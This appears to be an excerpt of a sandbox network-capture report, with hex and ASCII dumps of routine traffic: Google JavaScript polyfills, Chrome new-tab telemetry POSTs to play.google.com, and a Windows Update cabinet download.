                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 7d 2c 0a 31 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 5a 63 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 56 56 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 68 3d 5f 2e 6e 61 2e 43 75 73 74 6f 6d 45 76 65 6e 74 2c 6b 3d 5f 2e 6e 61 2e 45 76 65 6e 74 2c 6c 3d 5f 2e 6e 61 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 3b 69 66 28 74 79 70 65 6f 66 20 6c 3d 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 29 72 65 74 75 72 6e 21 30 3b 74 79 70 65 6f 66 20 68 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72
                                                                                                                                                                                          Data Ascii: },1)};e.prototype.Zca=function(){if(this.VV)return!1;var h=_.na.CustomEvent,k=_.na.Event,l=_.na.dispatchEvent;if(typeof l==="undefined")return!0;typeof h==="function"?h=new h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledr
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 3b 72 2d 2d 3b 72 3d 3d 30 26 26 6d 28 71 29 7d 7d 76 61 72 20 71 3d 5b 5d 2c 72 3d 30 3b 64 6f 20 71 2e 70 75 73 68 28 76 6f 69 64 20 30 29 2c 72 2b 2b 2c 63 28 6c 2e 76 61 6c 75 65 29 2e 71 79 28 70 28 71 2e 6c 65 6e 67 74 68 2d 0a 31 29 2c 6e 29 2c 6c 3d 6b 2e 6e 65 78 74 28 29 3b 77 68 69 6c 65 28 21 6c 2e 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 49 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b
                                                                                                                                                                                          Data Ascii: ;r--;r==0&&m(q)}}var q=[],r=0;do q.push(void 0),r++,c(l.value).qy(p(q.length-1),n),l=k.next();while(!l.done)})};return e});var Ia=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 44 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 44 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74 75 72 6e 20 63 28 6c 29 26 26 44 61 28 6c 2c 66 29 3f 6c 5b 66 5d 5b 74 68 69 73 2e 44 61 5d 3a 76 6f 69 64 20 30 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 72 65 74
                                                                                                                                                                                          Data Ascii: =m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!Da(l,f))throw Error("f`"+l);l[f][this.Da]=m;return this};k.prototype.get=function(l){return c(l)&&Da(l,f)?l[f][this.Da]:void 0};k.prototype.has=function(l){ret
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 4a 6b 3d 66 28 29 3b 74 68 69 73 2e 73 69 7a 65 3d 30 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 21 21 64 28 74 68 69 73 2c 6b 29 2e 57 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 28 6b 3d 64 28 74 68 69 73 2c 6b 29 2e 57 65 29 26 26 6b 2e 76 61 6c 75 65 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 72 65 74 75 72 6e 5b 6b 2e 6b 65 79
                                                                                                                                                                                          Data Ascii: .prototype.clear=function(){this[0]={};this[1]=this[1].Jk=f();this.size=0};c.prototype.has=function(k){return!!d(this,k).We};c.prototype.get=function(k){return(k=d(this,k).We)&&k.value};c.prototype.entries=function(){return e(this,function(k){return[k.key
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 28 29 3b 72 65 74 75 72 6e 20 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 3d 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 2e 78 21 3d 34 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 66 2e 76 61 6c 75 65 5b 30 5d 3f 21 31 3a 65 2e 6e 65 78 74 28 29 2e 64 6f 6e 65 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 61 3b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 74 68 69 73 2e 53 61 3d 6e 65 77 20 4d 61 70 3b 69 66 28 63 29 7b 63 3d 0a 5f 2e 43 61 28 63 29 3b 66 6f 72 28 76 61 72 20 64 3b 21 28 64 3d 63 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 74 68 69 73 2e 61 64 64 28 64 2e 76 61 6c 75 65 29 7d 74 68 69 73 2e 73 69 7a 65 3d 74 68 69 73 2e 53 61 2e 73 69 7a 65 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65
                                                                                                                                                                                          Data Ascii: ();return f.done||f.value[0]==c||f.value[0].x!=4||f.value[1]!=f.value[0]?!1:e.next().done}catch(h){return!1}}())return a;var b=function(c){this.Sa=new Map;if(c){c=_.Ca(c);for(var d;!(d=c.next()).done;)this.add(d.value)}this.size=this.Sa.size};b.prototype
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 3e 35 36 33 31 39 7c 7c 62 2b 31 3d 3d 3d 64 29 72 65 74 75 72 6e 20 65 3b 62 3d 63 2e 63 68 61 72 43 6f 64 65 41 74 28 62 2b 31 29 3b 72 65 74 75 72 6e 20 62 3c 35 36 33 32 30 7c 7c 62 3e 35 37 33 34 33 3f 65 3a 28 65 2d 35 35 32 39 36 29 2a 31 30 32 34 2b 62 2b 39 32 31 36 7d 7d 7d 29 3b 0a 70 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e
                                                                                                                                                                                          Data Ascii: >56319||b+1===d)return e;b=c.charCodeAt(b+1);return b<56320||b>57343?e:(e-55296)*1024+b+9216}}});pa("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0||e>1114111||e!==Math.
                                                                                                                                                                                          2025-05-14 02:32:04 UTC1460INData Raw: 6f 6c 76 65 28 62 28 29 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 63 3b 7d 29 7d 29 7d 7d 29 3b 70 61 28 22 4f 62 6a 65 63 74 2e 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 62 3d 3d 3d 63 3f 62 21 3d 3d 30 7c 7c 31 2f 62 3d 3d 3d 31 2f 63 3a 62 21 3d 3d 62 26 26 63 21 3d 3d 63 7d 7d 29 3b 0a 70 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 63 6c 75 64 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 74 68 69 73 3b 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 64 3d 53 74 72 69 6e 67 28 64 29 29 3b 76
                                                                                                                                                                                          Data Ascii: olve(b()).then(function(){throw c;})})}});pa("Object.is",function(a){return a?a:function(b,c){return b===c?b!==0||1/b===1/c:b!==b&&c!==c}});pa("Array.prototype.includes",function(a){return a?a:function(b,c){var d=this;d instanceof String&&(d=String(d));v


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          6192.168.2.449748192.178.49.2064438080C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-05-14 02:32:05 UTC686OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                          host: play.google.com
                                                                                                                                                                                          content-length: 920
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                                                                                                                          content-type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          accept: */*
                                                                                                                                                                                          origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                          x-client-data: CNOVywE=
                                                                                                                                                                                          sec-fetch-site: cross-site
                                                                                                                                                                                          sec-fetch-mode: cors
                                                                                                                                                                                          sec-fetch-dest: empty
                                                                                                                                                                                          sec-fetch-storage-access: active
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          accept-language: en-GB,en-US;q=0.9,en;q=0.8
                                                                                                                                                                                          priority: u=1, i
                                                                                                                                                                                          2025-05-14 02:32:05 UTC920OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 33 34 22 5d 2c 5b 22 4e 6f 74 3a 41 2d 42 72 61 6e 64 22 2c 22 32 34 22 5d 2c 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 33 34 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 33 34 2e 30 2e 36 39 39 38 2e 33 36 22 5d 2c 5b 31 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 34 37 31 38 39 39 32 32 37 31 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e
                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Chromium","134"],["Not:A-Brand","24"],["Google Chrome","134"]],0,"Windows","10.0.0","x86","","134.0.6998.36"],[1,0]]],373,[["1747189922717",null,null,null,null,n
                                                                                                                                                                                          2025-05-14 02:32:05 UTC911INHTTP/1.1 200 OK
                                                                                                                                                                                          access-control-allow-origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                          access-control-allow-credentials: true
                                                                                                                                                                                          access-control-allow-headers: X-Playlog-Web
                                                                                                                                                                                          set-cookie: NID=524=WEKjq0voBi4ayd5k5FzbG4Boh-Mts3umhnmrJmlYXBdge7RtkNriOaXbZ_zJ_4I2yHwWjJYxjnkhmdpN6QQKvcwuHdVo7cXR9KO2nlMgdVomhDmrM-_Y95_fOMlMnCyjuD3kDCkA3uiQroPQkfUPQKHaMMx_wiMY5LvN-ZA-JvGOPDuxfyEn2qGnZHLtgGZwjGmgOro; expires=Thu, 13-Nov-2025 02:32:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                          p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                          content-type: text/plain; charset=UTF-8
                                                                                                                                                                                          content-encoding: gzip
                                                                                                                                                                                          date: Wed, 14 May 2025 02:32:05 GMT
                                                                                                                                                                                          server: Playlog
                                                                                                                                                                                          content-length: 131
                                                                                                                                                                                          x-xss-protection: 0
                                                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          expires: Wed, 14 May 2025 02:32:05 GMT
                                                                                                                                                                                          cache-control: private
                                                                                                                                                                                          2025-05-14 02:32:05 UTC131INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 3d 8a 31 0a c3 30 0c 45 ef a2 59 01 db b2 31 e9 a6 34 19 4a 69 52 6c 75 28 42 f8 02 21 5b a7 d2 bb 37 81 d2 37 7d de 7f 0a 9d 07 dc 5e eb 8a aa 0a 3c 8f 65 b9 8c 6d e0 f3 f5 71 07 74 86 0a 03 8b 4c e5 d9 aa b0 d4 9f ab 37 2e d2 ea 24 ff 4a ca 32 1f d3 b0 23 a2 98 29 a7 3e ba 10 fb ec 43 48 7b 61 f8 06 9f 53 a0 e3 82 93 7a b7 63 1f fb 02 0a fb aa a7 83 00 00 00
                                                                                                                                                                                          Data Ascii: =10EY14JiRlu(B![77}^<emqtL7.$J2#)>CH{aSzc
                                                                                                                                                                                          2025-05-14 02:32:06 UTC903OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                          host: play.google.com
                                                                                                                                                                                          content-length: 925
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                                                                                                                          content-type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          accept: */*
                                                                                                                                                                                          origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                          x-client-data: CNOVywE=
                                                                                                                                                                                          sec-fetch-site: cross-site
                                                                                                                                                                                          sec-fetch-mode: cors
                                                                                                                                                                                          sec-fetch-dest: empty
                                                                                                                                                                                          sec-fetch-storage-access: active
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          accept-language: en-GB,en-US;q=0.9,en;q=0.8
                                                                                                                                                                                          cookie: NID=524=WEKjq0voBi4ayd5k5FzbG4Boh-Mts3umhnmrJmlYXBdge7RtkNriOaXbZ_zJ_4I2yHwWjJYxjnkhmdpN6QQKvcwuHdVo7cXR9KO2nlMgdVomhDmrM-_Y95_fOMlMnCyjuD3kDCkA3uiQroPQkfUPQKHaMMx_wiMY5LvN-ZA-JvGOPDuxfyEn2qGnZHLtgGZwjGmgOro
                                                                                                                                                                                          priority: u=1, i
                                                                                                                                                                                          2025-05-14 02:32:06 UTC925OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 33 34 22 5d 2c 5b 22 4e 6f 74 3a 41 2d 42 72 61 6e 64 22 2c 22 32 34 22 5d 2c 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 33 34 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 33 34 2e 30 2e 36 39 39 38 2e 33 36 22 5d 2c 5b 31 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 34 37 31 38 39 39 32 33 39 38 31 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e
                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Chromium","134"],["Not:A-Brand","24"],["Google Chrome","134"]],0,"Windows","10.0.0","x86","","134.0.6998.36"],[1,0]]],373,[["1747189923981",null,null,null,null,n
                                                                                                                                                                                          2025-05-14 02:32:06 UTC911INHTTP/1.1 200 OK
                                                                                                                                                                                          access-control-allow-origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                          access-control-allow-credentials: true
                                                                                                                                                                                          access-control-allow-headers: X-Playlog-Web
                                                                                                                                                                                          set-cookie: NID=524=F6MOQjFgXH70HvMFrPXOUWDGzNkSrxYhz-ces_-ck8W5C3dA15u45PXwwR_i9PA_QqpLlTaSsPU3MYFVHc3-Hwe6BF27ASKMs1nnONYuj3WUynalDYMM1HSwPiKvT-KtrRwGIqHLKbh8KJj2tWe26_haWnIMaG5_qPdhkKUodF3Wx3RJ0ejBVnOGw5FHWKGBQNSVxik; expires=Thu, 13-Nov-2025 02:32:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                          p3p: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                          content-type: text/plain; charset=UTF-8
                                                                                                                                                                                          content-encoding: gzip
                                                                                                                                                                                          date: Wed, 14 May 2025 02:32:06 GMT
                                                                                                                                                                                          server: Playlog
                                                                                                                                                                                          content-length: 131
                                                                                                                                                                                          x-xss-protection: 0
                                                                                                                                                                                          x-frame-options: SAMEORIGIN
                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                          expires: Wed, 14 May 2025 02:32:06 GMT
                                                                                                                                                                                          cache-control: private
                                                                                                                                                                                          2025-05-14 02:32:06 UTC131INData Raw: 1f 8b 08 00 00 00 00 00 02 ff 3d 8a 31 0a c3 30 0c 45 ef a2 59 01 db b2 31 e9 a6 34 19 4a 69 52 6c 75 28 42 f8 02 21 5b a7 d2 bb 37 81 d2 37 7d de 7f 0a 9d 07 dc 5e eb 8a aa 0a 3c 8f 65 b9 8c 6d e0 f3 f5 71 07 74 86 0a 03 8b 4c e5 d9 aa b0 d4 9f ab 37 2e d2 ea 24 ff 4a ca 32 1f d3 b0 23 a2 98 29 a7 3e ba 10 fb ec 43 48 7b 61 f8 06 9f 53 a0 e3 82 93 7a b7 63 1f fb 02 0a fb aa a7 83 00 00 00
                                                                                                                                                                                          Data Ascii: =10EY14JiRlu(B![77}^<emqtL7.$J2#)>CH{aSzc


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          7192.168.2.44975452.149.20.212443
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-05-14 02:32:15 UTC309OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=nyuNTUbx63B6wMY&MD=cMd2RACN HTTP/1.1
                                                                                                                                                                                          host: slscr.update.microsoft.com
                                                                                                                                                                                          accept: */*
                                                                                                                                                                                          user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                          accept-encoding: identity
                                                                                                                                                                                          2025-05-14 02:32:15 UTC541INHTTP/1.1 200 OK
                                                                                                                                                                                          cache-control: no-cache
                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                          content-type: application/octet-stream
                                                                                                                                                                                          expires: -1
                                                                                                                                                                                          last-modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                          etag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                          ms-correlationid: 32142162-cfa2-4413-97e8-386fc40d3926
                                                                                                                                                                                          ms-requestid: 5f80eed3-54ec-4e9d-8701-995861ab38de
                                                                                                                                                                                          ms-cv: CI8rddttW0q5QEN+.0
                                                                                                                                                                                          x-microsoft-slsclientcache: 1440
                                                                                                                                                                                          content-disposition: attachment; filename=environment.cab
                                                                                                                                                                                          x-content-type-options: nosniff
                                                                                                                                                                                          date: Wed, 14 May 2025 02:32:15 GMT
                                                                                                                                                                                          content-length: 30005
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 25 dc 93 6a 9f d2 e0 c1 ea a0 79 31 c4 ab 34 9c e1 43 a8 b3 7e 55 3a 43 6e 5b 8c bc 1c ac b5 c5 db f6 d5 6b 9a 98 b7 61 91 ec 20 ed 8b 6b 6b 17 65 25 d4 6a aa b6 ca 84 bd 36 98 48 0e 5e cd 7c b0 80 4f 8a 29 1a bd 79 0a 95 15 94 2c 8d 46 d3 90 66 2a a1 20 71 50 9b 63 14 ba 66 53 25 93 57 c9 de 70 e3 0a f9 95 e5 f6 30 46 8b 99 e7 52 08 31 34 2a fb 7b 19 1f 7d d2 b0 1d 12 db 90 d7 13 2b 94 d3 2c 24 3c da 5c c7 eb 72 6a b9 b9 58 16 5c 90 d7 e5 cd 92 95 32 0d 6b cf 04 8d 4e 78 08 6b 05 10 2b 3f 35 f1 9b 05 cf 25 b3 f8 b8 80 45 47 a6 3f 98 fb 9d 6d bb 59 60 bf 35 2a 6a 71 da 05 32 46 9c 40 06 81 a2 d0 24 13 09 4e 44 ad c8 6d e0 34 6a 19 a9 18 60 e4 00 e9 b7 1d ae 08 07 c3 31 50 c7 68 68 e8 50 28 40 75 d8 01 17 46 0a 23 66 bd 70 60 ba 6d fe d2 9a c3 39 9c fb a0
                                                                                                                                                                                          Data Ascii: %jy14C~U:Cn[ka kke%j6H^|O)y,Ff* qPcfS%Wp0FR14*{}+,$<\rjX\2kNxk+?5%EG?mY`5*jq2F@$NDm4j`1PhhP(@uF#fp`m9
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 88 13 d2 ca b4 06 b4 39 d4 f9 dc 75 86 ec f8 71 28 61 7c 4c c7 63 c8 ea 15 e7 75 7d 6d 29 70 2a 71 c0 e4 ec e9 97 37 59 2c ef da 63 ae b1 f3 e5 0b 3b cf df 39 d7 39 fa 82 03 6e ce 5d df 9a 7e b1 21 8c f5 e5 b9 a1 86 fb 42 cd 8f 80 65 85 b7 9b da 6d 66 ca ea e3 34 46 3b 0d 3a b7 43 5e 3d 7a 57 67 f5 fc 5c 06 83 b4 c2 d8 63 75 21 29 ed dd c1 86 8d 5d 43 f3 49 fd 3d 76 02 f5 6a 5c 57 4b 0c 0f 16 4c dc ae 2c 6b d6 f7 77 f2 a8 5d 45 e3 67 7b 15 83 04 9a 73 32 62 e8 67 d8 7e c1 4c 27 14 66 da 01 f8 70 cc af 50 49 02 86 a1 cc 11 74 0c 24 7f 15 ad 28 be 9d 40 0c 81 9d a0 c6 02 69 80 3c 40 a6 20 29 90 04 80 7d 78 26 1e ec 70 98 20 80 f0 1b 08 60 00 70 d4 d7 e1 d0 c7 a1 d0 95 43 18 82 b8 25 55 45 8c a6 3c b1 98 db 86 78 7d 26 94 17 d0 3b 82 42 0d 40 0d 50 49 53 4a
                                                                                                                                                                                          Data Ascii: 9uq(a|Lcu}m)p*q7Y,c;99n]~!Bemf4F;:C^=zWg\cu!)]CI=vj\WKL,kw]Eg{s2bg~L'fpPIt$(@i<@ )}x&p `pC%UE<x}&;B@PISJ
                                                                                                                                                                                          2025-05-14 02:32:15 UTC1460INData Raw: 9e 4c 48 88 5f 1b 99 a2 79 07 02 1f 96 7e 0e 91 7d ff 94 85 f8 7a 67 50 22 aa 5f 9d b1 ea a1 e7 40 3d e0 af d4 09 80 e0 46 08 01 02 dc 7c 87 51 31 df 61 b4 fc b5 f8 5f f9 9c 7e 37 d4 2e 33 2b bb ab b5 2d 61 e9 d4 86 25 79 97 ff 9e 60 01 ae e6 85 4f 0d 70 27 cb 1c ca cd c6 bb 4c ee e3 f1 e7 bd 04 1a c4 ed 5f ae e6 74 15 34 ce df 79 d8 bc c2 5b 3a 92 70 aa 60 87 34 ac 37 4f 07 1b c3 55 5a 75 15 93 ac 8f 49 e2 e4 eb 89 76 36 16 f0 83 b7 d5 bb 9f 67 2f 58 2c 57 77 4a 51 b7 7d ea c5 74 6c 12 68 7c 96 77 f7 76 81 a8 ad 31 99 b2 9b a5 fe 82 2e a8 87 5d 00 c3 8c c5 2b de 55 90 4a db 4b 20 93 f0 89 59 6d 27 da 83 c9 06 97 5b cf e2 8c 3a da b1 f1 9f 15 df ae f8 48 9f 72 16 a2 76 86 7d ce 3a 98 57 9f df 1b d0 21 92 e5 7e 21 70 a6 89 08 f9 40 7b 4f 81 e4 ad 37 f1 88
                                                                                                                                                                                          Data Ascii: LH_y~}zgP"_@=F|Q1a_~7.3+-a%y`Op'L_t4y[:p`47OUZuIv6g/X,WwJQ}tlh|wv1.]+UJK Ym'[:Hrv}:W!~!p@{O7
